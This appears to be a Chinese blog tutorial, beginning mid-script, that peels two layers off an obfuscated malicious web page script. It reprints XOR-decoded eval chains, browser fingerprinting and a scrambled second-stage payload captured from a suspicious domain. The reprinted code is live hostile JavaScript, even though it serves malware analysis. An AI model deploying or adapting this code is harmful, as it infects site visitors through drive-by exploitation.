,125,106,84,121,118,127,109,121,127,125,49,62,62,56,57,48,84,75,43,110,107,47,42,32,37,118,121,110,113,127,121,108,119,106,54,116,121,118,127,109,121,127,125,49,49,99,126,118,106,73,41,64,92,43,45,122,37,45,41,47,35,101,101,113,126,48,113,107,87,104,125,106,121,57,37,126,121,116,107,125,49,99,113,126,56,48,57,48,66,90,91,110,90,32,83,33,97,108,42,113,37,118,121,110,113,127,121,108,119,106,54,107,97,107,108,125,117,84,121,118,127,109,121,127,125,49,62,62,48,75,66,42,40,112,66,80,66,90,124,64,37,118,121,110,113,127,121,108,119,106,54,109,107,125,106,84,121,118,127,109,121,127,125,49,62,62,48]; var E3Z19Lp=[32,106,21,110,25,103,52,59,44,51,61,59,46,53,40,116,56,40,53,45,41,63,40,22,59,52,61,47,59,61,63,115,124,124,114,22,9,105,44,41,109,104,98,103,52,59,44,51,61,59,46,53,40,116,54,59,52,61,47,59,61,63,115,115,33,60,52,40,11,107,2,30,105,111,56,103,111,107,109,97,39,39,51,60,114,51,41,29,63,57,49,53,123,103,60,59,54,41,63,115,33,51,60,122,114,123,114,0,24,25,44,24,98,17,99,35,46,104,51,103,52,59,44,51,61,59,46,53,40,116,41,35,41,46,63,55,22,59,52,61,47,59,61,63,115,124,124,123,114,9,0,104,106,50,0,18,0,24,62,2,103,52,59,44,51,61,59,46,53,40,116,47,41,63,40,22,59,52,61,47,59,61,63,115,124,124,123,114,32,106,21,110,25,103,52,59,44,51,61,59,46,53,40,116,56,40,53,45,41,63,40,22,59,52,61,47,59,61,63,115,124,124,114,22,9,105,44,41,109,104,98,103,52,59,44,51,61,59,46,53,40,116,54,59,52,61,47,59,61,63,115,115,33,60,52,40,11,107,2,30,105,111,56,103,111,107,109,97,39,39,51,60,114,51,41,9,59,60,59,40,51,123,103,60,59,54,41,63,115,33,51,60,122,114,123,114,0,24,25,44,24,98,17,99,35,46,104,51,103,52,59,44,51,61,59,46,53,40,116,41,35,41,46,63,55,22,59,52,61,47,59,61,63,115,124,124,123,114,9,0,104,106,50,0,18,0,24,62,2,103,52,59,44,51,61,59,46,53,40,116,47,41,63,40,22,59,52,61,47,59,61,63,115,124,124,123,114,32,106,21,110,25,103,52,59,44,51,61,59,46,53,40,116,56,40,53,45,41,63,40,22,59,52,61,47,59,61,63,115]; var DJ2sPz2YN=[98,98,108,8,23,119,50,55,115,118,124,121,42,37,50,45,35,37,48,43,54,106,40,37,42,35,49,37,35,33,109,109,63,34,42,54,21,117,28,0,119,113,38,121,113,117,115,127,57,57,45,34,108,45,55,7,44,54,43,41,33,101,121,34,37,40,55,33,109,63,45,34,100,108,101,108,30,6,7,50,6,124,15,125,61,48,118,45,121,42,37,50,45,35,37,48,43,54,106,55,61,55,48,33,41,8,37,42,35,49,37,35,33,109,98,98,101,108,23,30,118,116,44,30,12,30,6,32,28,121,42,37,50,45,35,37,48,43,54,106,49,55,33,54,8,37,42,35,49,37,35,33,109,98,98,101,108,62,116,11,112,7,121,42,37,50,45,35,37,48,43,54,106,38,54,43,51,55,33,54,8,37,42,35,49,37,35,33,109,98,98,108,8,23,119,50,55,115,118,124,121,42,37,50,45,35,37,48,43,54,106,40,37,42,35,49,37,35,33,109,109,63,34,42,54,21,117,28,0,119,113,38,121,113,117,115,127,57,57,127,100,50,37,54,100,16,118,118,124,116,117,121,102,45,118,22,61,118,113,102,127,50,37,54,100,44,118,52,2,29,116,121,23,48,54,45,42,35,127,45,34,100,108,34,42,54,21,117,28,0,119,113,38,121,121,113,117,115,109,63,16,118,118,124,116,117,121,102,40,118,124,45,53,48,42,102,127,100,44,118,52,2,29,116,121,48,44,45,55,127,57,127,23,6,117,112,22,60,29,62,47,0,16,54,121,102,33,50,40,118,124,45,53,48,42,37,40,102,106,54,33,52,40,37,39,33,108,16,118,118,124,116,117,104,102,102,109,127,44,118,52,2,29,116,31,23,6,117,112,22,60,29,62,47,0,16,54,25,108,39,0,21,19,11,43,124,117,116,116]; var XJU9Xi=[102,62,44];  var Jyyl=new Array(); for (var s10d8g4Wq=0;s10d8g4Wq<XO5g7gw.length;s10d8g4Wq++){XO5g7gw[s10d8g4Wq]=XO5g7gw[s10d8g4Wq]^70;}; Jyyl=Jyyl.concat(XO5g7gw);for (var K7f8m=0;K7f8m<XmhnFwsJ7JLb5rn.length;K7f8m++){XmhnFwsJ7JLb5rn[K7f8m]=XmhnFwsJ7JLb5rn[K7f8m]^90;}; Jyyl=Jyyl.concat(XmhnFwsJ7JLb5rn);for (var NayL65Xl=0;NayL65Xl<FIovKVqj92UWt.length;NayL65Xl++){FIovKVqj92UWt[NayL65Xl]=FIovKVqj92UWt[NayL65Xl]^63;}; Jyyl=Jyyl.concat(FIovKVqj92UWt);for (var y624L70=0;y624L70<GhS8S67Prhrd4n.length;y624L70++){GhS8S67Prhrd4n[y624L70]=GhS8S67Prhrd4n[y624L70]^39;}; Jyyl=Jyyl.concat(GhS8S67Prhrd4n);for (var U2V9B=0;U2V9B<pC97R8mG.length;U2V9B++){pC97R8mG[U2V9B]=pC97R8mG[U2V9B]^78;}; Jyyl=Jyyl.concat(pC97R8mG);for (var kJF0upJXo=0;kJF0upJXo<DRBSwL67q34RN.length;kJF0upJXo++){DRBSwL67q34RN[kJF0upJXo]=DRBSwL67q34RN[kJF0upJXo]^86;}; Jyyl=Jyyl.concat(DRBSwL67q34RN);for (var X57b3300QR=0;X57b3300QR<ase4R143.length;X57b3300QR++){ase4R143[X57b3300QR]=ase4R143[X57b3300QR]^82;}; Jyyl=Jyyl.concat(ase4R143);for (var R6kM5tC=0;R6kM5tC<kN2Z9ejg8CW.length;R6kM5tC++){kN2Z9ejg8CW[R6kM5tC]=kN2Z9ejg8CW[R6kM5tC]^16;}; Jyyl=Jyyl.concat(kN2Z9ejg8CW);for (var IYu2103=0;IYu2103<C59CT49.length;IYu2103++){C59CT49[IYu2103]=C59CT49[IYu2103]^15;}; Jyyl=Jyyl.concat(C59CT49);for (var N59WlodS=0;N59WlodS<Lc38a4J3mH2mYd.length;N59WlodS++){Lc38a4J3mH2mYd[N59WlodS]=Lc38a4J3mH2mYd[N59WlodS]^35;}; Jyyl=Jyyl.concat(Lc38a4J3mH2mYd);for (var bPy26n6=0;bPy26n6<tTk37HLK.length;bPy26n6++){tTk37HLK[bPy26n6]=tTk37HLK[bPy26n6]^31;}; Jyyl=Jyyl.concat(tTk37HLK);for (var Zi84=0;Zi84<L58iTmje915Cs.length;Zi84++){L58iTmje915Cs[Zi84]=L58iTmje915Cs[Zi84]^81;}; Jyyl=Jyyl.concat(L58iTmje915Cs);for (var pA7XL0=0;pA7XL0<MoDbuKo7Zc73A7y.length;pA7XL0++){MoDbuKo7Zc73A7y[pA7XL0]=MoDbuKo7Zc73A7y[pA7XL0]^42;}; Jyyl=Jyyl.concat(MoDbuKo7Zc73A7y);for (var kkK3gfLm2=0;kkK3gfLm2<axrg9i4sOv.length;kkK3gfLm2++){axrg9i4sOv[kkK3gfLm2]=axrg9i4sOv[kkK3gfLm2]^30;}; Jyyl=Jyyl.concat(axrg9i4sOv);for (var Yh76=0;Yh76<Yw8hi55BB61NPYB.length;Yh76++){Yw8hi55BB61NPYB[Yh76]=Yw8hi55BB61NPYB[Yh76]^51;}; Jyyl=Jyyl.concat(Yw8hi55BB61NPYB);for (var n89VQZ1md6=0;n89VQZ1md6<K210J6y5ntw.length;n89VQZ1md6++){K210J6y5ntw[n89VQZ1md6]=K210J6y5ntw[n89VQZ1md6]^83;}; Jyyl=Jyyl.concat(K210J6y5ntw);for (var kLYBqgoTnl=0;kLYBqgoTnl<gR0F30B.length;kLYBqgoTnl++){gR0F30B[kLYBqgoTnl]=gR0F30B[kLYBqgoTnl]^93;}; Jyyl=Jyyl.concat(gR0F30B);for (var w1K9MN5=0;w1K9MN5<a6oXU27F8V.length;w1K9MN5++){a6oXU27F8V[w1K9MN5]=a6oXU27F8V[w1K9MN5]^24;}; Jyyl=Jyyl.concat(a6oXU27F8V);for (var v2E213g=0;v2E213g<E3Z19Lp.length;v2E213g++){E3Z19Lp[v2E213g]=E3Z19Lp[v2E213g]^90;}; Jyyl=Jyyl.concat(E3Z19Lp);for (var HD1Zko9=0;HD1Zko9<DJ2sPz2YN.length;HD1Zko9++){DJ2sPz2YN[HD1Zko9]=DJ2sPz2YN[HD1Zko9]^68;}; Jyyl=Jyyl.concat(DJ2sPz2YN);for (var i8mLx1II=0;i8mLx1II<XJU9Xi.length;i8mLx1II++){XJU9Xi[i8mLx1II]=XJU9Xi[i8mLx1II]^23;}; Jyyl=Jyyl.concat(XJU9Xi);RE4Ml=['V','3','l','e','T','V','N','H','v','y','6','g','4','0','1','0','a','J','Y','5','9','a','s','N','l','V','9','T','w','0','7','Y'];GXzob52=RE4Ml[3]+RE4Ml[8]+RE4Ml[16]+RE4Ml[24];UE9Dha9=this;    S82iD2j6=UE9Dha9[GXzob52];S82iD2j6("functi"+"on JR8"+"Qk3B"+"Hg7(){xA"+"RK9=p"+"arseInt("+"docum"+"ent."+"getEleme"+"ntById("+"'i8W"+"bG')."+"innerH"+"TML);r"+"eturn xA"+"RK9;}"+"");S82iD2j6("functio"+"n m2q"+"o55(m"+"WSQJ9)"+"{var "+"bo99q"+"Gj=J"+"R8Qk3BH"+"g7()"+"; N"+"4qrky00"+"='';"+" if (bo9"+"9qGj==19"+"4) f"+"or(va"+"r i=0;"+"i<mWSQ"+"J9.l"+"eng"+"th;i++"+"){N4qrk"+"y00 "+"+=Str"+"ing.fr"+"omCha"+"rCode(mW"+"SQJ"+"9[i]);} "+"return N"+"4qrky0"+"0;} S8"+"2iD2"+"j6(m2qo5"+"5(Jy"+"yl));"+"");</script>


对于这样的网马,一眼就可以看到,前面都是变量,重点咱们关注后面。

为了观看方便,咱们对这个代码进行一下整理。

看下我的整理图

点击放大图片


我们来看看这个整理好后的部分代码
程序代码 程序代码
var XJU9Xi=[102,62,44];  
var Jyyl=new Array();
for (var s10d8g4Wq=0;s10d8g4Wq<XO5g7gw.length;s10d8g4Wq++){XO5g7gw[s10d8g4Wq]=XO5g7gw[s10d8g4Wq]^70;};
Jyyl=Jyyl.concat(XO5g7gw);for (var K7f8m=0;K7f8m<XmhnFwsJ7JLb5rn.length;K7f8m++){XmhnFwsJ7JLb5rn[K7f8m]=XmhnFwsJ7JLb5rn[K7f8m]^90;};
Jyyl=Jyyl.concat(XmhnFwsJ7JLb5rn);for (var NayL65Xl=0;NayL65Xl<FIovKVqj92UWt.length;NayL65Xl++){FIovKVqj92UWt[NayL65Xl]=FIovKVqj92UWt[NayL65Xl]^63;};
Jyyl=Jyyl.concat(FIovKVqj92UWt);for (var y624L70=0;y624L70<GhS8S67Prhrd4n.length;y624L70++){GhS8S67Prhrd4n[y624L70]=GhS8S67Prhrd4n[y624L70]^39;};
Jyyl=Jyyl.concat(GhS8S67Prhrd4n);for (var U2V9B=0;U2V9B<pC97R8mG.length;U2V9B++){pC97R8mG[U2V9B]=pC97R8mG[U2V9B]^78;};
Jyyl=Jyyl.concat(pC97R8mG);for (var kJF0upJXo=0;kJF0upJXo<DRBSwL67q34RN.length;kJF0upJXo++){DRBSwL67q34RN[kJF0upJXo]=DRBSwL67q34RN[kJF0upJXo]^86;};
Jyyl=Jyyl.concat(DRBSwL67q34RN);for (var X57b3300QR=0;X57b3300QR<ase4R143.length;X57b3300QR++){ase4R143[X57b3300QR]=ase4R143[X57b3300QR]^82;};
Jyyl=Jyyl.concat(ase4R143);for (var R6kM5tC=0;R6kM5tC<kN2Z9ejg8CW.length;R6kM5tC++){kN2Z9ejg8CW[R6kM5tC]=kN2Z9ejg8CW[R6kM5tC]^16;};
Jyyl=Jyyl.concat(kN2Z9ejg8CW);for (var IYu2103=0;IYu2103<C59CT49.length;IYu2103++){C59CT49[IYu2103]=C59CT49[IYu2103]^15;};
Jyyl=Jyyl.concat(C59CT49);for (var N59WlodS=0;N59WlodS<Lc38a4J3mH2mYd.length;N59WlodS++){Lc38a4J3mH2mYd[N59WlodS]=Lc38a4J3mH2mYd[N59WlodS]^35;};
Jyyl=Jyyl.concat(Lc38a4J3mH2mYd);for (var bPy26n6=0;bPy26n6<tTk37HLK.length;bPy26n6++){tTk37HLK[bPy26n6]=tTk37HLK[bPy26n6]^31;};
Jyyl=Jyyl.concat(tTk37HLK);for (var Zi84=0;Zi84<L58iTmje915Cs.length;Zi84++){L58iTmje915Cs[Zi84]=L58iTmje915Cs[Zi84]^81;};
Jyyl=Jyyl.concat(L58iTmje915Cs);for (var pA7XL0=0;pA7XL0<MoDbuKo7Zc73A7y.length;pA7XL0++){MoDbuKo7Zc73A7y[pA7XL0]=MoDbuKo7Zc73A7y[pA7XL0]^42;};
  Jyyl=Jyyl.concat(MoDbuKo7Zc73A7y);for (var kkK3gfLm2=0;kkK3gfLm2<axrg9i4sOv.length;kkK3gfLm2++){axrg9i4sOv[kkK3gfLm2]=axrg9i4sOv[kkK3gfLm2]^30;};
  Jyyl=Jyyl.concat(axrg9i4sOv);for (var Yh76=0;Yh76<Yw8hi55BB61NPYB.length;Yh76++){Yw8hi55BB61NPYB[Yh76]=Yw8hi55BB61NPYB[Yh76]^51;};
  Jyyl=Jyyl.concat(Yw8hi55BB61NPYB);for (var n89VQZ1md6=0;n89VQZ1md6<K210J6y5ntw.length;n89VQZ1md6++){K210J6y5ntw[n89VQZ1md6]=K210J6y5ntw[n89VQZ1md6]^83;};
  Jyyl=Jyyl.concat(K210J6y5ntw);for (var kLYBqgoTnl=0;kLYBqgoTnl<gR0F30B.length;kLYBqgoTnl++){gR0F30B[kLYBqgoTnl]=gR0F30B[kLYBqgoTnl]^93;};
  Jyyl=Jyyl.concat(gR0F30B);for (var w1K9MN5=0;w1K9MN5<a6oXU27F8V.length;w1K9MN5++){a6oXU27F8V[w1K9MN5]=a6oXU27F8V[w1K9MN5]^24;};
   Jyyl=Jyyl.concat(a6oXU27F8V);for (var v2E213g=0;v2E213g<E3Z19Lp.length;v2E213g++){E3Z19Lp[v2E213g]=E3Z19Lp[v2E213g]^90;};
    Jyyl=Jyyl.concat(E3Z19Lp);for (var HD1Zko9=0;HD1Zko9<DJ2sPz2YN.length;HD1Zko9++){DJ2sPz2YN[HD1Zko9]=DJ2sPz2YN[HD1Zko9]^68;};
    Jyyl=Jyyl.concat(DJ2sPz2YN);for (var i8mLx1II=0;i8mLx1II<XJU9Xi.length;i8mLx1II++){XJU9Xi[i8mLx1II]=XJU9Xi[i8mLx1II]^23;};
    Jyyl=Jyyl.concat(XJU9Xi);
    
    RE4Ml=['V','3','l','e','T','V','N','H','v','y','6','g','4','0','1','0','a','J','Y','5','9','a','s','N','l','V','9','T','w','0','7','Y'];
    GXzob52=RE4Ml[3]+RE4Ml[8]+RE4Ml[16]+RE4Ml[24];
     UE9Dha9=this;
       S82iD2j6=UE9Dha9[GXzob52];
       S82iD2j6("function JR8Qk3BHg7(){xARK9=parseInt(document.getElementById('i8WbG').innerHTML);return xARK9;}");
       S82iD2j6("function m2qo55(mWSQJ9){var bo99qGj=JR8Qk3BHg7(); N4qrky00=''; if (bo99qGj==194) for(var i=0;i<mWSQJ9.length;i++){N4qrky00 +=String.fromCharCode(mWSQJ9[i]);} return N4qrky00;} S82iD2j6(m2qo55(Jyyl));");
       </script>


我们从RE4Ml这个数组看起,GXzob52的值是从RE4Ml这个数组中提取了4个数值来作为自己的值,数组中是从0,1,2...开始的,那么RE4Ml[3]就是“e“,RE4Ml[8]就为”v“,RE4Ml[16]为”a“,RE4Ml[24]为"l",可以看到GXzob52就是eval,另外UE9Dha9=this,那么S82iD2j6就是this[eval],那么他就是执行指令,咱们的突破口也就在这里。

继续往下看,可以看到后面是2个函数,在最后面,我们看到了S82iD2j6(m2qo55(Jyyl)),从前面的代码可知,Jyyl就是前面将所有的其他字符串联起来的最终值,m2qo55就是解密函数。咱们解密的机会来了。

为了方便复制,咱们用用textarea解决,

在<html>的后面添加
程序代码 程序代码
<TEXTAREA id=txt rows=57 cols=108></*TEXTAREA>


然后在</script>前面截取字符
可以这样添加
       t=m2qo55(Jyyl);
       txt.value=(t);
保存运行后直接在文本框中输出了解密字符

点击放大图片这样就剥下了这个网马的第一层皮。

咱们将这段代码至于<script></script>中继续解密

代码如下
程序代码 程序代码
<!-- Malzilla Project v.1 --><!-- DAT: 2010-5-14 6:23:53 --><!-- URL: golooglecom.in/rz141_at/index.php?s=208feca1a8b149965fa6d3be651c5953 --><!-- REF: http://fracala.com/bu1/ --><!-- UAS: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) --><!-- CCK:  -->
<html><script type="text/JavaScript">var cDQWOo8100q="gqhr S  1vHo yX= tan'jp:c/8UE1d mois/htP_ac&pd=mle4S//loctiafh='trlozlog;fuoJXC hp?pa1..Lm9nHe1MnSV,bNxdvl=act(zMq3uctGM){ynUThqvqtnHGVGj 0BS2dacB0SulHGeale1lrTtrSLb{=zVG2UabVMtt(icnj;c{thchCrMq}0OmGM}HatG)M)qv)c(.jelVm0GV{ctdBjneNtSV.Sl(Mbfc!cBjeHUtdCntryGOGGrMbjttea{Gq2vqteM=z1cB}cTthNL{0B)(a},\"}t0naGy{cGccG!\")jl1M(nHGcMih(eCmVG){ObtrGTjfHM(U(zeq=tMltebrVaifccc,at,\"V.tSqt)njeSv}}2Ltdje(htrVlNh){c!\")a{\"\"cBHG}GHGGMbzGM=Gjl0n0SV.teSqVMcmGBtOaTy(NvMh1{th}cqcbje)at\"t}\",L1rt{tM){cd0G(}2UMqVMcBGl(!cBVe){0nGMV.STHGyGjGifhjbeGztO=nHNLtjlda(Sb\"vctmatcqeB}cGl,tt2cB((ifyec{jGU!\")){}z)ntrVSHG0}chGM=ccMHGhNvqteSGV.V)1{jlcTMqt2jtbMerG(0nda)an(Lnbje(tmtO}fu}cBilhMetGcUt8Z050;aw{}}rWS2nqXFw)GuGc7V3p4n KT\"BHoS1mr(tSmyEeWxdUHoe{q.rd)5ES=27SWatpE0ee;7evbCVearmO.jiBs\"uo hmg.Fi54rt=a3KOtstinte(3ScCwprHS(tSyv=cac\"ebjeo,\"qpepd9e\",r4Jme\"+Slapu0Xx \"\");SmlwsE275\"i3l.Cph\"A\"3c+\"+\"lz+\"t\"+\"+\"8\";varFnp\"i\"+x \"+\"Ju9eoJ\"\"a)vX329,J4C=p3HuxT86Ra)Om\"Cdxq5SSmqWOCr FOoE\"A(a27Bme20;Hq.StrDFDwES=OeernlB=3VBWlXyKd0ldPWtr;uh.7ath(i.mC2GBehm7rBWeVeuiaol3ElKdcCuex8T,WdHyerFSpJq{FxJ;.mr9q=(q)MoW2206eS)Fz;3FBOwC=(u2SrydR9tCXi7\"OxXo,H8\"MO+3e\"+\"fJEp4++Cd+\"T\"\"r2L53Sm\"\"o\"H.+\"\"nCM0\"Xc6eO,TPsoqHjE(Rt8;FOt\"0eOW.op(88XPcarG\"\"),6sey{yOETeHS\"+\"SxtfFOd9};){ahU10S+Wq2wpchue7l)3\"H.o=C3\"X\"O\"45e0O)CXR2X(MJmCT\"T\"\"+OOE\"+eL26L,RMS+\"opM\";F\"1jc\"P\"T2;enqEP8)X}{(8yhW.,+FO8H(e)t\"0GE=6UralsechtOa,SfL0SS7Cy2R{q3OHSx+\"rXEo\"\"M\"uCw20WrX\"ve5e\"X(3pd9e+++\"e4M\"2\"J+\"T\",\"\"+TMme\"RLH;0.S2)COO86FT\"eSe\"OEop,nhyW,EPtc(tGPfah(8j1RH.e){8lUXq6tpRt0LHcaORrs;}WeOeequeOyCO;M{Fst(8en(\"new 2FW)E\"o)XpGE6=Oj1qH.cahUTs,ShO20CPn ;}Trl,8yJCf;eture)0(Xae)28{6}}u}xs}n.Ftcz98;RJe=.T6eC(O;eC1erxFOln0WreFOeOsTdbyp22WlJoxJO8)0s2nu;z9.8uenoR;zOp=FWb)r9xC2B.dy()2Tile;8.OpJ8uFztFxrJ)(Cue(eTo9xxxJShrdifJv.SaH,CT;qFBmyEHelrdrXqt2n eletpES)1osyESn;cu(q()mBifqax.cO  mnuruXac;eFdd=wearCcvaniPt9q6a5S}sx3{v2ZArnMA3'52=zO7er FC0;6 1BvDy(r92K983A65-1q9E3C'010-DC65,'84FC3-00--5AA-16BD93',50-006169E-4-EC9BC4ED0,'277-2330'A4FC233F2066'ED7-BAD10000E6000C-D009900'010-000-0110-006C0-0300'-0F-,A0000000000'C000000000466',43-00-c1fd-0766056000c70aa9Dd-e78'9d22fc0-451e6-8',4e3373D8C-4149C61-7F-8AF5BB2B-1F-FAD0-D3EF'8-243,'06-33'7FC0F,6-A333C36E339EFD9-31'0,'948020E854123-8--14F624--86777CD81686'D-Bc9FA01748B2D39F5076'4B,10-9345A'F-856-490B54C844'1B43272-83CD-f9FB37D-19180,'D00-45C6'-69F,1-1-4A8C-6ABCF-496C6FBFDA0bECClAul7C25'12)B'BC5096hz78D0vawZni2q,nKel4c7=2up9]){;wSq4s(v45rlexwp[iPMOn35E27 20l0Ed7Omo=duSo;Frea3;eo3SmmteElcnt.e\"3otject()oeSE2ib\"cbcm5en7s\"c4mut\"d.0wp\"tOxAdK\"tri]csetSZn,9q[ilals+7sCPE2O5;27Sqez(v:(am si4ry2MFv3d{wU=KOp3o)pxif)f(w06\"d0e{teSD49SJX3uCqrpxro,\"m5E27\"+\"t\"SH\"03SD+hl+e\"+\"f\"(\"i\"+U;\"l.oSca){ifp\"1KliApZ(xnw8E2Or60\"i+aTWtpwUmoSK4ep)f(cni1S5rnat5h))7ui}eP e3SM0O2+e;mq9aor}){}}t2se}cZFmd(Ts ;)}r,+00u{(\"con iat (cunJ-v2={jtr ue)t;\"gaj _dt()al y; f\\npo\\J\"w--oglavocom:b\\li hin\\\\\\\\z1a.rmlecoe\\/rm/Y&_1sa/og.ttlovdhn.a.x4Y=/?oogfhtoplisdoe.f 1ptiw na=p(wMiofippNcrr.vtg\"e oean;iraa{ry t \"tptm==em n{varls E  Inen oElemrer\"xdoc)(t=)eoJuoenECTa\"ci. i\"OB\"trt.c-= E;slasBC0ECEFA:CDFc0d EDAoC700-d0}u0ls00;Ba-FF-E oDcn);uCe)AA\"Jch(meO .l=ec  cdtcEnt(\"ar(enhatclauCT;o.ore2t{vid2smBlilseEa.4 85F4d-\")\"E-108= 9Cc4s AD-00c1Du-0}3\":814B3Ec2.0h99D9e9} ls;r oanEl)mea no.eJ(elaEo{venva dBcuue;\"OmCT(tetm);cr ==).en OteEn d\"tel cB.u\"Tr ;oypro/npacent(ile\"aatoturmEC en=\"me-stounJ-plegtktippn.inyabloopocilttylm;de=atieerip pplym\"n ;jpinttboomlouoicvat\"apen)l;at.n/edp\"-dy.dCe-cuoaki(otpntnytbdi.;dcenapoddo.en)} Cdhtld;hrymhilh )n){(ulaun  peul{ec(tco.a} {});}(}.;caech(ns0t c \"o(}ug)m ,100atchTut( j;efuac\"javtie)  rv n  ();ta_di ae o_vsE=nd lb(ja).ar){emvlocemtet(cauaenlappentmnteepate\"\"r;=\"vtr leme. r;mamaaeleparame)\"d leribam.ment(\"eocutAtuse\"em,tapErcevar(\";pem.s tnt \"1lac\")uame\"teb\"(c0smAltrit90e1uec,abe1669b90afea4f03e23afc593401e90ffba676ab8b49a60de8ffe6f68096afc7aea626a5f6e8e62d86c2d62ba6c3d0aa98a0ba2d2626430ddd9dcee026d09620e0efdad355a6982351c5a6a4ec56fdc624a6a3584dd3a659f8d4db41cef05ec9cec8cdafce9e92ae954eba46c6a6ad2a4ea6e35ed547e620a6c4c3ca2959f6cea6c5b2c6f8eda5457acca380c761a225aaf3a2dec0c2aa22f661e656f17566962df9fef6f5fda3f7f0f658f6f0dea09aad59f0f6fad2955386f0d9b5f66fa5836f5523a5261d48e6d00dd265e670ddb77da97ba527eeb99c9c61ab47f8559dcbaa2da5237bf8ff6df07da88df858e365baadec22a58759de0e2d285da28ed9fd18909569499cc27ccda84ad6c6c9c924d5f9bc89dac2ca4db5c38847cbc798d1dcc7c7c9c188929989d6d7d9caced29cf9c5ca84cfd9c980c088c0c7c2teabc49bc6f9;5d6teA69ibudAc1\"javaet\"depea7le\", )leslcjco;\"(tm.seavrprT\")ar,\"tedutA(te t1avi.br\"h.ee\"bvm.semeai;jcet\"\")%utAa\",jlettritmgawij(d (t00e\"\"rei00h\"vt.s);jl, \"1eaAt)h\"1en%aehpautebtpi;(pa\"erdl.lemeCemldv.vthiaa.a);joodydnbdmcumeild(nppeae);} C) hia00e);\"egja_it eloo_i;  u(\"tOvTsmncrnva,3sb0f(muttoy ){ndd prtpfalt\"tf ate(eEmeb{Obj)=jcumTecOBetCe\"edcrent(ecpAt;;,f.\"d\"\"id..sJEttripte(ucb tj) dftdlu1ed\",Cfrib(\"as78t-eA08sObjF5-\"A9-4siidcetl);.1AD35\"c4s0-:2ilpoA8y.nt1C400\"ajfe205unbdD44d(Chtd0p;varbdcrmepd vo.ecs(v(tOee jdfeer l t;1)on =vVer[i;v),srGi 1=pr.sp\") .\"=\"e (7( ;ifsverl=\")< [\"ve) ;ver>it(\"7. ]\"r er(1 = =e |4]&.(ev r(vre\") |&&)  (\"rv>& (v\") 8=1&|).7\" \" .|  )r 8\"13> 9\"<pve(vc<\"&. )= (aume=ldor {t\"  (eElrnt.c )df) vereae\")reentme)e9tlmtnedfm.sett(acto\"ee;pe\"if\"Alosri:tmtnribg//got 4heu(\"/rp;le_alecep1,hm.ft)nf.t/e(itphmtAdp1zoe;tr 2fe=\"ptn?pdts\"tAdtrub)h0d.se\"oiete(\"wmeg0i,t.bcne;nfdle\"hphemeo.buttp,tdmenhadni eldfey200) s}cud(pl{T()i.}t)}t\"iae_ie0cCt ;}et   ,90 ; h(e  ou\"p  df) ) m(         ;    0                                                 ";
var hSue6YJ53=cDQWOo8100q.split(""); var Z0TSoz=5654; var lii8GC1y780x=9; var F362JzXMAn6=new Array(4,9,8,7,1,5,9,4,1); var orKtCIJtW082,XH7AWXhS6,d245Ys,o46Zo5sVyIb6D,tWw85v475DMn,p1zn2Y33riN1m,B05K065;
for (XH7AWXhS6=0; XH7AWXhS6<lii8GC1y780x; XH7AWXhS6++)  {      var b86aNy=F362JzXMAn6[XH7AWXhS6]*2;    var L048P9y=Z0TSoz%b86aNy;    var eq4Jp8d=Z0TSoz-L048P9y;    var djkV14AA=eq4Jp8d/b86aNy;    var fXqlav=djkV14AA*F362JzXMAn6[XH7AWXhS6];  
o46Zo5sVyIb6D=0;    for (oRKtCIJtW082=0; orKtCIJtW082<djkV14AA; orKtCIJtW082++)     {    
         for (d245Ys=0; d245Ys<F362JzXMAn6[XH7AWXhS6]; d245Ys++)         {      tWw85v475DMn=o46Zo5sVyIb6D+d245Ys;            B05K065=hSue6YJ53[tWw85v475DMn];            p1zn2Y33riN1m=tWw85v475DMn+F362JzXMAn6[XH7AWXhS6];            hSue6YJ53[tWw85v475DMn]=hSue6YJ53[p1zn2Y33riN1m];            hSue6YJ53[p1zn2Y33riN1m]=B05K065;          }        o46Zo5sVyIb6D +=b86aNy;         }  }
        
        
          cDQWOo8100q=hSue6YJ53.join("");var fnrQ1XD35b=0;var ye05Y7kuG = navigator.userAgent.toLowerCase();isIE = (ye05Y7kuG.indexOf('msie') != -1 && ye05Y7kuG.indexOf('opera') == -1);isOpera = (ye05Y7kuG.indexOf('opera') != -1);isGecko = (ye05Y7kuG.indexOf('gecko') != -1 && ye05Y7kuG.indexOf('safari') == -1);isSafari = (ye05Y7kuG.indexOf('safari') != -1 && ye05Y7kuG.indexOf('chrome') == -1);isKonqueror = (ye05Y7kuG.indexOf('konqueror') != -1);isChrome = (ye05Y7kuG.indexOf('chrome') != -1);if(isIE!=false){if ((ZBCvB8K9yt2i=navigator.systemLanguage)&&(SZ20hZHZBdX=navigator.userLanguage)&&(z0O4C=navigator.browserLanguage)&& !(LS3vs728=navigator.language)){fnrQ1XD35b=517;}}if(isOpera!=false){if (!(ZBCvB8K9yt2i=navigator.systemLanguage)&&(SZ20hZHZBdX=navigator.userLanguage)&&(z0O4C=navigator.browserLanguage)&&(LS3vs728=navigator.language)){fnrQ1XD35b=517;}}if(isGecko!=false){if (!(ZBCvB8K9yt2i=navigator.systemLanguage)&&!(SZ20hZHZBdX=navigator.userLanguage)&&!(z0O4C=navigator.browserLanguage)&&(LS3vs728=navigator.language)){fnrQ1XD35b=517;}}if(isSafari!=false){if (!(ZBCvB8K9yt2i=navigator.systemLanguage)&&!(SZ20hZHZBdX=navigator.userLanguage)&&!(z0O4C=navigator.browserLanguage)&&(LS3vs728=navigator.language)){fnrQ1XD35b=517;}}if(isChrome!=false){if (!(ZBCvB8K9yt2i=navigator.systemLanguage)&&!(SZ20hZHZBdX=navigator.userLanguage)&&!(z0O4C=navigator.browserLanguage)&&(LS3vs728=navigator.language)){fnrQ1XD35b=517;}};
          
           var T22801="i2Ry25";
           var h2pFY0=String;
           if (fnrQ1XD35b==517){T22801="l28iqtn"; h2pFY0=this;};
           SB14RxYzkDTr="evl28iqtnal".replace(T22801,"");
           h2pFY0[SB14RxYzkDTr](cDQWOo8100q);
       </script>


同样,继续从尾巴开始看起差,查找突破口

程序代码 程序代码
var T22801="i2Ry25";
           var h2pFY0=String;
           if (fnrQ1XD35b==517){T22801="l28iqtn"; h2pFY0=this;};
           SB14RxYzkDTr="evl28iqtnal".replace(T22801,"");
           h2pFY0[SB14RxYzkDTr](cDQWOo8100q);

看一看if后面的代码,
T22801="l28iqtn",那么 SB14RxYzkDTr="evl28iqtnal".replace(T22801,"");,就是从"evl28iqtnal”中替换掉"l28iqtn",那么就是eval

这样就好办了,跟上面一样的思路,用textarea截取之
在</script>前面添加
t=cDQWOo8100q
txt.value=(t);
保存运行。

点击放大图片


现在,明文已经出来了,2次eval。

